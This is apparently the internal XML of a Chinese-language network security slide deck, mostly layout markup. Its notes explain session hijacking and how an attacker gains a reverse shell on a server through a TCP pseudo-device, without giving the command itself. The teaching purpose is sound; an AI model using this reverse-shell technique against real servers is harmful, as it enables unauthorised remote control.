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2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId49"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId50"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="374" r:id="rId5"/>
    <p:sldId id="548" r:id="rId6"/>
    <p:sldId id="549" r:id="rId7"/>
    <p:sldId id="550" r:id="rId8"/>
    <p:sldId id="375" r:id="rId9"/>
    <p:sldId id="500" r:id="rId10"/>
    <p:sldId id="501" r:id="rId11"/>
    <p:sldId id="571" r:id="rId12"/>
    <p:sldId id="519" r:id="rId13"/>
    <p:sldId id="539" r:id="rId14"/>
    <p:sldId id="555" r:id="rId15"/>
    <p:sldId id="556" r:id="rId16"/>
    <p:sldId id="557" r:id="rId17"/>
    <p:sldId id="558" r:id="rId18"/>
    <p:sldId id="520" r:id="rId19"/>
    <p:sldId id="540" r:id="rId20"/>
    <p:sldId id="521" r:id="rId21"/>
    <p:sldId id="561" r:id="rId22"/>
    <p:sldId id="562" r:id="rId23"/>
    <p:sldId id="541" r:id="rId24"/>
    <p:sldId id="507" r:id="rId25"/>
    <p:sldId id="559" r:id="rId26"/>
    <p:sldId id="560" r:id="rId27"/>
    <p:sldId id="542" r:id="rId28"/>
    <p:sldId id="522" r:id="rId29"/>
    <p:sldId id="523" r:id="rId30"/>
    <p:sldId id="543" r:id="rId31"/>
    <p:sldId id="503" r:id="rId32"/>
    <p:sldId id="504" r:id="rId33"/>
    <p:sldId id="505" r:id="rId34"/>
    <p:sldId id="506" r:id="rId35"/>
    <p:sldId id="563" r:id="rId36"/>
    <p:sldId id="564" r:id="rId37"/>
    <p:sldId id="565" r:id="rId38"/>
    <p:sldId id="544" r:id="rId39"/>
    <p:sldId id="545" r:id="rId40"/>
    <p:sldId id="546" r:id="rId41"/>
    <p:sldId id="566" r:id="rId42"/>
    <p:sldId id="567" r:id="rId43"/>
    <p:sldId id="568" r:id="rId44"/>
    <p:sldId id="569" r:id="rId45"/>
    <p:sldId id="570" r:id="rId46"/>
    <p:sldId id="517" r:id="rId47"/>
    <p:sldId id="547" r:id="rId48"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>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00"/>
    <a:srgbClr val="EAEAEA"/>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1"/>
    <p:restoredTop sz="78566" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="1068" y="51"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2882"/>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607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p>
            <a:pPr lvl="0" algn="r" eaLnBrk="1" fontAlgn="base" hangingPunct="1"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" strike="noStrike" noProof="1"/>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4-09T02:53:24.505"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="ignorePressure" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 17,'0'1,"1"0,0 1,-1-1,1 0,0 0,-1 0,1 0,0 0,0 0,0 0,0 0,0 0,0 0,0-1,1 1,-1 0,0-1,0 1,1-1,-1 1,0-1,0 1,1-1,-1 0,3 0,3 1,1-1,-1 1,11-3,111-14,-73 7,93-3,774 14,-838 1,94 18,-99-10,125 2,65-14,-245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6786"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6787"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0" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspec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246789"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第五级</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246790"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6791"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p>
            <a:pPr lvl="0" algn="r" eaLnBrk="1" fontAlgn="base" hangingPunct="1"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" strike="noStrike" noProof="1"/>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75586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28087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67286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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>随机端口：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RandShort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3993964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33199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如果攻击者可以在服务器中运行一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序，他们会带来更大的危害。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177541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会话劫持攻击成功后，可以在服务器中运行一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但攻击者无法控制这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序，不能输入命令，也看不到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的任何输出。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3833175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会话劫持攻击成功后，可以在服务器中运行一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但攻击者无法控制这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序，不能输入命令，也看不到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的任何输出。这是因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在服务器中运行时，它使用的是本地的输入输出设备。为了控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序，攻击者必须让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序使用可以由他们控制的输入输出设备。一个可行的想法是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪设备进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的输入输出。使用这样的伪设备，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接的一端作为输入或者输出，另一端由攻击者控制。这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被称为反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13751570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62016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2050" name="AutoShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2393950"/>
            <a:ext cx="7772400" cy="109538"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="618" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="618" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1000" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>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solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228354" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="990600"/>
            <a:ext cx="7772400" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="3429000"/>
            <a:ext cx="7010400" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版副标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effec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 name="Rectangle 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 name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"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3838" y="304800"/>
            <a:ext cx="2001837" cy="5715000"/>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566738" y="304800"/>
            <a:ext cx="5854700" cy="5715000"/>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43000"/>
          </a:xfrm>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457200" y="1600200"/>
            <a:ext cx="4038600" cy="453072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48200" y="1600200"/>
            <a:ext cx="4038600" cy="453072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43000"/>
          </a:xfrm>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457200" y="1600200"/>
            <a:ext cx="4038600" cy="453072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quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1600200"/>
            <a:ext cx="4038600" cy="21891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内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="3941763"/>
            <a:ext cx="4038600" cy="2189162"/>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6" name="日期占位符 5"/>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页脚占位符 6"/>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43000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="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a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>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OverObj">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43000"/>
          </a:xfrm>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457200" y="1600200"/>
            <a:ext cx="8229600" cy="21891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57200" y="3941763"/>
            <a:ext cx="8229600" cy="2189162"/>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2050" name="AutoShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2393950"/>
            <a:ext cx="7772400" cy="109538"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="618" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="618" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1000" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>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solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228354" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="990600"/>
            <a:ext cx="7772400" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="3429000"/>
            <a:ext cx="7010400" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版副标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effec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 name="Rectangle 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 name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"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5667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434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accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>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3838" y="304800"/>
            <a:ext cx="2001837" cy="5715000"/>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566738" y="304800"/>
            <a:ext cx="5854700" cy="5715000"/>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43000"/>
          </a:xfrm>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457200" y="1600200"/>
            <a:ext cx="4038600" cy="453072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48200" y="1600200"/>
            <a:ext cx="4038600" cy="453072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43000"/>
          </a:xfrm>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457200" y="1600200"/>
            <a:ext cx="4038600" cy="453072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quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1600200"/>
            <a:ext cx="4038600" cy="21891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内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="3941763"/>
            <a:ext cx="4038600" cy="2189162"/>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6" name="日期占位符 5"/>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页脚占位符 6"/>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43000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="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a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>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xOverObj">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43000"/>
          </a:xfrm>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457200" y="1600200"/>
            <a:ext cx="8229600" cy="21891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57200" y="3941763"/>
            <a:ext cx="8229600" cy="2189162"/>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5667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434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accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>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574675" y="304800"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
